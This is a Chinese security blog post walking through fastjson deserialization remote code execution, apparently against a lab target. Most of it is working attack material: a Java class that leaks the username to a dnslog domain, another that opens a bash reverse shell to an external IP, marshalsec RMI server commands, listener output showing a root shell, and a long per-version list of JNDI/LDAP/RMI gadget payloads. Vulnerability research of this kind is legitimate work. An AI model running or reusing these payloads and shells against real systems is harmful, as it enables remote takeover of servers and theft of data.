<!DOCTYPE html>
<html>

    <head>
<meta charset="utf-8">
<meta http-equiv="X-UA-Compatible" content="IE=edge">
<meta name="viewport" content="width=device-width, initial-scale=1">
<meta name="description" content="本站由哨兵安全实验室支持创办">

<link rel="shortcut icon" href="/assets/img/favicon.png">
<link type="application/atom+xml" rel="alternate" href="/feed.xml" title="©「哨兵」| Sentry Security" />



<!-- Open Graph metadata -->
<meta property="og:type" content="website" />
<meta property="og:title" content="「fastjson」:浅谈json的反序列化 | ©「哨兵」| Sentry Security" />
<meta property="og:description" content="本站由哨兵安全实验室支持创办" />
<meta property="og:image" content="http://localhost:80/assets/img/logo-share.png" /> <!-- WeChat requires that thumbnail image is larger than 300x300 -->
<meta property="og:url" content="http://localhost:80/blog/2020/fastjson/UNdeser/" />
<title> 「fastjson」:浅谈json的反序列化 | ©「哨兵」| Sentry Security | Sentrylab</title>

<link rel="stylesheet" type="text/css" href="/assets/css/pace-minimal.css">
<script src="/assets/js/pace.min.js"></script>


<!-- Bootstrap core CSS -->
<link href="/assets/css/bootstrap.css" rel="stylesheet">
<!-- Custom styles for this template -->
<link href="/assets/css/style.css" rel="stylesheet">
<link href="/assets/css/font-awesome.min.css" rel="stylesheet">
<link href="/assets/css/font-awesome-v4-shims.min.css" rel="stylesheet">
<link rel="stylesheet" href="/assets/css/404-style.css">


<script src="/assets/js/jquery.min.js"></script>
<script src="/assets/js/bootstrap.min.js"></script>




</head>


    <body>
        <!-- Fixed navbar -->
<div class="navbar navbar-default navbar-fixed-top" role="navigation">
  <div class="container">
    <div class="navbar-header">
      <button type="button" class="navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
        <span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
      <a class="navbar-brand" href="/"><!--
   --><picture>
  <source srcset="/assets/img/logo-small-dark.png 1x, /assets/img/logo-small-dark@2x.png 2x, /assets/img/logo-small-dark@3x.png 3x, /assets/img/logo-small-dark@4x.png 4x" media="(prefers-color-scheme: dark)" />
  
  <img src="/assets/img/logo-small.jpg" srcset="/assets/img/logo-small.png 1x, /assets/img/logo-small@2x.png 2x, /assets/img/logo-small@3x.png 3x, /assets/img/logo-small@4x.png 4x" />
  </picture> Sentrylab</a>
    </div>
    <div class="navbar-collapse collapse navbar-right">
      <ul class="nav navbar-nav">
        <li ><a href="/">HOME</a></li>
        <li class="active"><a href="/blog/">BLOG</a></li>
        <li ><a href="/events/">EVENTS</a></li>
        <li ><a href="/categories/">CATEGORIES</a></li>
        <li ><a href="/daily/">DAILY</a></li>
        <li><a href="https://about.sentrylab.cn">ABOUT ME</a></li>
      </ul>
    </div><!--/.nav-collapse -->

  </div>
</div>

            <div class="container mtb">
    <div class="row">
        <!-- SINGLE POST -->
        <div class="col-lg-8">
            <!-- Blog Post  -->
            <a href="/blog/2020/fastjson/UNdeser/"><h3 class="ctitle">「fastjson」:浅谈json的反序列化</h3></a>
            <p><csmall>May 19, 2020. |  By: Bin4xin.</csmall></p>
            <div class="post-content"> 
            <h3 id="fastjson指纹特征">fastjson指纹特征</h3>
<p>访问页面，查看反包是一个指定的json格式的数据。请求包：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>GET / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age<span class="o">=</span>0
DNT: 1
Upgrade-Insecure-Requests: 1
User-Agent: Mozilla/5.0 <span class="o">(</span>Windows NT 10.0<span class="p">;</span> Win64<span class="p">;</span> x64<span class="o">)</span> AppleWebKit/537.36 <span class="o">(</span>KHTML, like Gecko<span class="o">)</span> Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/webp,image/apng,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,application/signed-exchange<span class="p">;</span><span class="nv">v</span><span class="o">=</span>b3<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept-Language: zh-CN,zh<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.7
Connection: close
</code></pre></div></div>
<p>反包：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 
Content-Type: application/json<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>UTF-8
Content-Length: 28
Date: Tue, 19 May 2020 01:05:29 GMT
Connection: close

<span class="o">{</span>
    <span class="s2">"age"</span>:25,
    <span class="s2">"name"</span>:<span class="s2">"Bob"</span>
<span class="o">}</span>
</code></pre></div></div>
<p>如上的请求和反包。我们知道了json的格式直接构造参数，给服务器发包看看：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST / HTTP/1.1
Host: underattack-host:8090
Cache-Control: max-age<span class="o">=</span>0
DNT: 1
Upgrade-Insecure-Requests: 1
Content-Type: application/json
User-Agent: Mozilla/5.0 <span class="o">(</span>Windows NT 10.0<span class="p">;</span> Win64<span class="p">;</span> x64<span class="o">)</span> AppleWebKit/537.36 <span class="o">(</span>KHTML, like Gecko<span class="o">)</span> Chrome/81.0.4044.138 Safari/537.36
Accept: text/html,application/xhtml+xml,application/xml<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,image/webp,image/apng,<span class="k">*</span>/<span class="k">*</span><span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,application/signed-exchange<span class="p">;</span><span class="nv">v</span><span class="o">=</span>b3<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9
Accept-Encoding: <span class="nb">gzip</span>, deflate
Accept-Language: zh-CN,zh<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.9,en-US<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.8,en<span class="p">;</span><span class="nv">q</span><span class="o">=</span>0.7
Connection: close
Content-Length: 26

<span class="o">{</span><span class="s2">"name"</span>:<span class="s2">"hello"</span>, <span class="s2">"age"</span>:20<span class="o">}</span>
</code></pre></div></div>
<p>反包：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>HTTP/1.1 200 
Content-Type: application/json<span class="p">;</span><span class="nv">charset</span><span class="o">=</span>UTF-8
Content-Length: 30
Date: Tue, 19 May 2020 01:06:20 GMT
Connection: close

<span class="o">{</span>
    <span class="s2">"age"</span>:20,
    <span class="s2">"name"</span>:<span class="s2">"hello"</span>
<span class="o">}</span>
</code></pre></div></div>
<p>我们看到服务器端返回包为我们构造的包。</p>

<h4 id="fastjson-1224-反序列化导致任意命令执行漏洞">fastjson 1.2.24 反序列化导致任意命令执行漏洞</h4>
<p>fastjson在解析json的过程中，支持使用autoType来实例化某一个具体的类，并调用该类的set/get方法来访问属性。通过查找代码中相关的方法，即可构造出一些恶意利用链。</p>

<p>参考资料：</p>
<ul>
  <li>https://www.freebuf.com/vuls/208339.html</li>
  <li>http://xxlegend.com/2017/04/29/title-%20fastjson%20%E8%BF%9C%E7%A8%8B%E5%8F%8D%E5%BA%8F%E5%88%97%E5%8C%96poc%E7%9A%84%E6%9E%84%E9%80%A0%E5%92%8C%E5%88%86%E6%9E%90/</li>
</ul>

<p>首先编译并上传命令执行代码</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">## cat dnslog.java</span>

import java.lang.Runtime<span class="p">;</span>
import java.lang.Process<span class="p">;</span>

public class dnslog <span class="o">{</span>
    static <span class="o">{</span>
        try <span class="o">{</span>
            Runtime rt <span class="o">=</span> Runtime.getRuntime<span class="o">()</span><span class="p">;</span>
            String[] commands <span class="o">=</span> <span class="o">{</span><span class="s2">"/bin/sh"</span>, <span class="s2">"-c"</span>, <span class="s2">"ping user.</span><span class="sb">`</span><span class="nb">whoami</span><span class="sb">`</span><span class="s2">.c08aqu.dnslog.cn"</span><span class="o">}</span><span class="p">;</span>
            Process pc <span class="o">=</span> rt.exec<span class="o">(</span>commands<span class="o">)</span><span class="p">;</span>
            pc.waitFor<span class="o">()</span><span class="p">;</span>
        <span class="o">}</span> catch <span class="o">(</span>Exception e<span class="o">)</span> <span class="o">{</span>
            // <span class="k">do </span>nothing
        <span class="o">}</span>
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>
<p>编译：<code class="language-plaintext highlighter-rouge">javac dnslog.java</code>。生成class文件；然后我们借助<a href="https://github.com/mbechler/marshalsec">marshalsec</a>项目，启动一个RMI服务器，监听9999端口，并指定受害机器访问9999端口后，去加载远程服务器的类<code class="language-plaintext highlighter-rouge">dnslog.class</code>，而class文件就是执行command。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>git clone https://github.com/mbechler/marshalsec.git

<span class="nb">cd </span>marshalsec

mvn clean package <span class="nt">-DskipTests</span> <span class="c">##看到BUILD SUCCESS后进入target</span>

<span class="nb">cd </span>target

java <span class="nt">-cp</span> marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.RMIRefServer <span class="s2">"https://www.chihou.pro/##dnslog"</span> 9999

<span class="k">*</span> Opening JRMP listener on 9999
</code></pre></div></div>

<p>开启监听。向靶场服务器发送Payload，带上RMI的地址：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>POST数据：
<span class="o">{</span>
    <span class="s2">"b"</span>:<span class="o">{</span>

        <span class="s2">"@type"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>,

        <span class="s2">"dataSourceName"</span>:<span class="s2">"rmi://47.52.233.92:9999/dnslog"</span>,

        <span class="s2">"autoCommit"</span>:true
    <span class="o">}</span>
<span class="o">}</span>
<span class="nt">----</span>
<span class="o">{</span>
    <span class="s2">"name"</span>:<span class="o">{</span>
        <span class="s2">"@type"</span>:<span class="s2">"java.lang.Class"</span>,
        <span class="s2">"val"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>
    <span class="o">}</span>,

    <span class="s2">"x"</span>:<span class="o">{</span>

        <span class="s2">"@type"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>,
        <span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>,
        <span class="s2">"autoCommit"</span>:true
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>
<p>发送完毕后检查RMI服务器的监听记录：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="k">*</span> Opening JRMP listener on 9999
Have connection from /61.133.171.114:11430
Reading message...
Is RMI.lookup call <span class="k">for </span>dnslog 2
Sending remote classloading stub targeting https://www.chihou.pro/dnslog.class
Closing connection
</code></pre></div></div>
<p>受害机器已经访问了我们的服务器，最后检查是否执行dnslog命令；</p>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>user.root.c08aqu.dnslog.cn  61.132.161.12   2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.5    2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.12   2020-08-14 15:43:30
user.root.c08aqu.dnslog.cn  61.132.161.5    2020-08-14 15:43:30
</code></pre></div></div>
<p>可见，<code class="language-plaintext highlighter-rouge">ping</code>命令已成功执行;</p>

<p>######## 反弹shell
同样的，直接在poc代码里修改反弹shell的代码即可。</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>import java.lang.Runtime<span class="p">;</span>
import java.lang.Process<span class="p">;</span>

public class nc <span class="o">{</span>
    static <span class="o">{</span>
    
        try<span class="o">{</span>
        Runtime rt <span class="o">=</span> Runtime.getRuntime<span class="o">()</span><span class="p">;</span>
        String[] commands <span class="o">=</span> <span class="o">{</span><span class="s2">"/bin/bash"</span>,<span class="s2">"-c"</span>,<span class="s2">"bash -i &gt;&amp; /dev/tcp/47.52.233.92/12341 0&gt;&amp; 1"</span><span class="o">}</span><span class="p">;</span>
        Process pc <span class="o">=</span> rt.exec<span class="o">(</span>commands<span class="o">)</span><span class="p">;</span>
        pc.waitFor<span class="o">()</span><span class="p">;</span>
        <span class="o">}</span>catch <span class="o">(</span>Exception e<span class="o">)</span> <span class="o">{</span>
        //no
        <span class="o">}</span>
    
    <span class="o">}</span>
<span class="o">}</span>
</code></pre></div></div>
<p>同理即可获得反弹shell：</p>
<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="c">## nc -lvnp 12341</span>
Listening on 0.0.0.0 12341
Connection received on 120.242.209.70 3450
bash: cannot <span class="nb">set </span>terminal process group <span class="o">(</span>1<span class="o">)</span>: Inappropriate ioctl <span class="k">for </span>device
bash: no job control <span class="k">in </span>this shell
root@5a8812147218:/## <span class="nb">whoami
whoami
</span>root
</code></pre></div></div>

<h4 id="dnslog">dnslog</h4>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"rand1"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.InetAddress"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}}</span>

<span class="o">{</span><span class="s2">"rand2"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.Inet4Address"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}}</span>

<span class="o">{</span><span class="s2">"rand3"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.Inet6Address"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}}</span>

<span class="o">{</span><span class="s2">"rand4"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.InetSocketAddress"</span><span class="o">{</span><span class="s2">"address"</span>:,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}}}</span>

<span class="o">{</span><span class="s2">"rand5"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.URL"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}}</span>

一些畸形payload，不过依然可以触发dnslog：
<span class="o">{</span><span class="s2">"rand6"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"com.alibaba.fastjson.JSONObject"</span>, <span class="o">{</span><span class="s2">"@type"</span>: <span class="s2">"java.net.URL"</span>, <span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}}</span><span class="s2">""</span><span class="o">}}</span>
<span class="o">{</span><span class="s2">"@type"</span>: <span class="s2">"java.lang.AutoCloseable"</span>


<span class="o">{</span><span class="s2">"rand7"</span>:Set<span class="se">\[</span><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.URL"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}</span><span class="se">\]</span><span class="o">}</span>

<span class="o">{</span><span class="s2">"rand8"</span>:Set<span class="se">\[</span><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.URL"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}</span>

<span class="o">{</span><span class="s2">"rand9"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.net.URL"</span>,<span class="s2">"val"</span>:<span class="s2">"http://dnslog"</span><span class="o">}</span>


<span class="o">{</span><span class="s2">"@type"</span>: <span class="s2">"java.lang.AutoCloseable"</span>
</code></pre></div></div>

<hr />

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>

<span class="o">{</span><span class="s2">"a"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.lang.Class"</span>,<span class="s2">"val"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span><span class="o">}</span>,<span class="s2">"b"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}}</span>

<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}</span>
</code></pre></div></div>

<hr />

<ul>
  <li>1.2.41</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"Lcom.sun.rowset.JdbcRowSetImpl;"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>, <span class="s2">"autoCommit"</span>:true<span class="o">}</span>
// 直接加 <span class="o">[</span> 是不可以的，因为数组实例化的是Object类型，所以需要将传入的变量设置为数组格式，然后在com.alibaba.fastjson.serializer.ObjectArrayCodec中通过数组对象的getComponentType<span class="o">()</span>可以获得数组元素，即com.sun.rowset.JdbcRowSetImpl对象
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"[com.sun.rowset.JdbcRowSetImpl"</span><span class="o">[{</span><span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>,<span class="s2">"autoCommit"</span>:true]<span class="o">}</span>
</code></pre></div></div>

<ul>
  <li>1.2.42</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"LLcom.sun.rowset.JdbcRowSetImpl;;"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>, <span class="s2">"autoCommit"</span>:true<span class="o">}</span>
//原来在41版本的[还能用
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"[com.sun.rowset.JdbcRowSetImpl"</span><span class="o">[{</span><span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>,<span class="s2">"autoCommit"</span>:true]<span class="o">}</span>
</code></pre></div></div>

<ul>
  <li>1.2.43</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"</span>,<span class="s2">"properties"</span>:<span class="o">{</span><span class="s2">"data_source"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}}</span>
</code></pre></div></div>
<ul>
  <li>1.2.45</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"</span>,<span class="s2">"properties"</span>:<span class="o">{</span><span class="s2">"data_source"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}}</span>
</code></pre></div></div>
<ul>
  <li>1.2.47</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"a"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.lang.Class"</span>,<span class="s2">"val"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span><span class="o">}</span>,<span class="s2">"b"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}}}</span>

<span class="o">{</span><span class="s2">"a"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"java.lang.Class"</span>,<span class="s2">"val"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span><span class="o">}</span>,<span class="s2">"b"</span>:<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"com.sun.rowset.JdbcRowSetImpl"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"rmi://47.52.233.92:9999/expUseful"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}}}</span>

</code></pre></div></div>
<ul>
  <li>1.2.60</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.commons.configuration.JNDIConfiguration"</span>,<span class="s2">"prefix"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}</span>
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"oracle.jdbc.connector.OracleManagedConnectionFactory"</span>,<span class="s2">"xaDataSourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}</span>
</code></pre></div></div>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>oracle.jdbc.connector.OracleManagedConnectionFactory<span class="se">\"</span>,<span class="se">\"</span>xaDataSourceName<span class="se">\"</span>:<span class="se">\"</span>rmi://10.10.20.166:1099/ExportObject<span class="se">\"</span><span class="o">}</span>
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>org.apache.commons.configuration.JNDIConfiguration<span class="se">\"</span>,<span class="se">\"</span>prefix<span class="se">\"</span>:<span class="se">\"</span>ldap://10.10.20.166:1389/ExportObject<span class="se">\"</span><span class="o">}</span>


<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>org.apache.commons.configuration2.JNDIConfiguration<span class="se">\"</span>,<span class="se">\"</span>prefix<span class="se">\"</span>:<span class="se">\"</span>rmi://127.0.0.1:1099/Exploit<span class="se">\"</span><span class="o">}</span><span class="s2">"
</span></code></pre></div></div>
<ul>
  <li>1.2.62</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.xbean.propertyeditor.JndiConverter"</span>,<span class="s2">"AsText"</span>:<span class="s2">"rmi://127.0.0.1:1099/exploit"</span><span class="o">}</span>
</code></pre></div></div>

<ul>
  <li>1.2.66</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code><span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.shiro.jndi.JndiObjectFactory"</span>,<span class="s2">"resourceName"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}</span>
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"br.com.anteros.dbcp.AnterosDBCPConfig"</span>,<span class="s2">"metricRegistry"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}</span>
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.ignite.cache.jta.jndi.CacheJndiTmLookup"</span>,<span class="s2">"jndiNames"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}</span>
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig"</span>,<span class="s2">"properties"</span>: <span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"
java.util.Properties"</span>,<span class="s2">"UserTransaction"</span>:<span class="s2">"ldap://47.52.233.92:9999/expUseful"</span><span class="o">}}</span>
</code></pre></div></div>

<ul>
  <li>RMI</li>
</ul>

<div class="language-bash highlighter-rouge"><div class="highlight"><pre class="highlight"><code>
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"LLcom.sun.rowset.RowSetImpl;;"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"rmi://localhost:1099/Exploit"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}</span> 1.2.42
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"[com.sun.rowset.RowSetImpl"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"rmi://localhost:1099/Exploit"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}</span> 1.2.25v1.2.43
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"org.apache.ibatis.datasource.jndi.JndiDataSourceFactory"</span>,<span class="s2">"properties"</span>：<span class="s2">"data_source"</span>:<span class="s2">"rmi://localhost:1099/Exploit"</span><span class="o">}}</span> 1.2.25
<span class="o">{</span><span class="s2">"@type"</span>:<span class="s2">"Lcom.sun.rowset.RowSetImpl;"</span>,<span class="s2">"dataSourceName"</span>:<span class="s2">"rmi://localhost:1099/Exploit"</span>,<span class="s2">"autoCommit"</span>:true<span class="o">}</span>
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>com.zaxxer.hikari.HikariConfig<span class="se">\"</span>,<span class="se">\"</span>metricRegistry<span class="se">\"</span>:<span class="se">\"</span>rmi://127.0.0.1:1099/Exploit<span class="se">\"</span><span class="o">}</span>1.2.60
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>org.apache.commons.configuration.JNDIConfiguration<span class="se">\"</span>,<span class="se">\"</span>prefix<span class="se">\"</span>:<span class="se">\"</span>rmi://127.0.0.1:1099/Exploit<span class="se">\"</span><span class="o">}</span> 1.2.60
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>org.apache.commons.configuration2.JNDIConfiguration<span class="se">\"</span>,<span class="se">\"</span>prefix<span class="se">\"</span>:<span class="se">\"</span>rmi://127.0.0.1:1099/Exploit<span class="se">\"</span><span class="o">}</span> 1.2.61
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>org.apache.xbean.propertyeditor.JndiConverter<span class="se">\"</span>,<span class="se">\"</span>asText<span class="se">\"</span>:<span class="se">\"</span>rmi://localhost:1099/Exploit<span class="se">\"</span><span class="o">}</span>  1.2.62
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>br.com.anteros.dbcp.AnterosDBCPConfig<span class="se">\"</span>,<span class="se">\"</span>healthCheckRegistry<span class="se">\"</span>:<span class="se">\"</span>rmi://localhost:1099/Exploit<span class="se">\"</span><span class="o">}</span> AnterosDBCPConfig
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>br.com.anteros.dbcp.AnterosDBCPConfig<span class="se">\"</span>,<span class="se">\"</span>metricRegistry<span class="se">\"</span>:<span class="se">\"</span>rmi://localhost:1099/Exploit<span class="se">\"</span><span class="o">}</span> AnterosDBCPConfig
<span class="o">{</span><span class="se">\"</span>@type<span class="se">\"</span>:<span class="se">\"</span>com.ibatis.sqlmap.engine.transaction.jta.JtaTransactionConfig<span class="se">\"</span>,<span class="se">\"</span>properties<span class="se">\"</span>:<span class="o">{</span><span class="se">\"</span>UserTransaction<span class="se">\"</span>:<span class="se">\"</span>rmi://localhost:1099/Exploit<span class="se">\"</span><span class="o">}}</span> JtaTransactionConfig
</code></pre></div></div>


            </div>
            <div class="spacing"></div>
            <div>
	<div class="hline"></div>
	<h3><em>#</em> 申明</h3>
	<div class="spacing"></div>
	<h4><em>By: Bin4xin.</em></h4>
	<h4>转载请申明本文链接：<a href="/blog/2020/fastjson/UNdeser/" target="_blank"> 「fastjson」:浅谈json的反序列化</a></h4>

	<h3><em># Any Questions</em></h3>
	<div class="spacing"></div>
	<h4> >_ 对本文进行提问：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://github.com/Bin4xin/bin4xin.github.io/blob/1b4fffa6232dc6ffa2cece8be0d6c39e0c5f9cfe/blog/2020/fastjson/UNdeser/index.html%23L84" target="_blank"> <em><li class="fa fa-github"></li> Reference in new issue.</em></a></h4>

	<h4> >_ 对本文进行留言：<a href="https://github.com/Bin4xin/bin4xin.github.io/issues/new?permalink=https://bin4xin.github.io/blog/2020/fastjson/UNdeser/" target="_blank"> <em><li class="fa fa-github"></li> Leave a Comment.</em></a></h4>
	<div class="spacing"></div>
</div>
        </div><!--/col-lg-8 -->
        
        <div class="col-lg-3">
    <h4>Subscribe/订阅</h4>
    <div class="hline"></div>
        <p>
        <p class="rss-subscribe"><i class="fa fa-rss"></i> Subscribe to this blog <a href="/feed.xml">via RSS</a>.</p>
        </p>
    <div class="spacing"></div>
    <h4>Categories/分类目录</h4>
    <div class="hline"></div>
        
        <div class="post-meta mb-3">
        <div class="spacing"></div>
<!--          <i class="far fa-folder-open fa-fw mr-1"></i>-->
<!--          -->
<!--            <a href='/blog/'>blog</a>-->
<!---->
<!--          -->
<!--            <a href='/%E6%BC%8F%E6%B4%9E%E5%A4%8D%E7%8E%B0/'>漏洞复现</a>-->
<!---->
<!--          -->
<!--            <a href='/%E7%AC%94%E8%AE%B0/'>笔记</a>-->
<!---->
<!--          -->
<!--            <a href='/vulnhub/'>vulnhub</a>-->
<!---->
<!--          -->
<!--            <a href='/sql-inject/'>Sql-Inject</a>-->
<!---->
<!--          -->
            <details>
                <summary class="point">本文分类</summary>
                
                <p>
                    <i class="far fa-folder fa-fw mr-1"></i> <a href='/blog/'>blog</a><!--                    <span class="badge badge-theme pull-right">0</span>-->
                </p>
                
                <p>
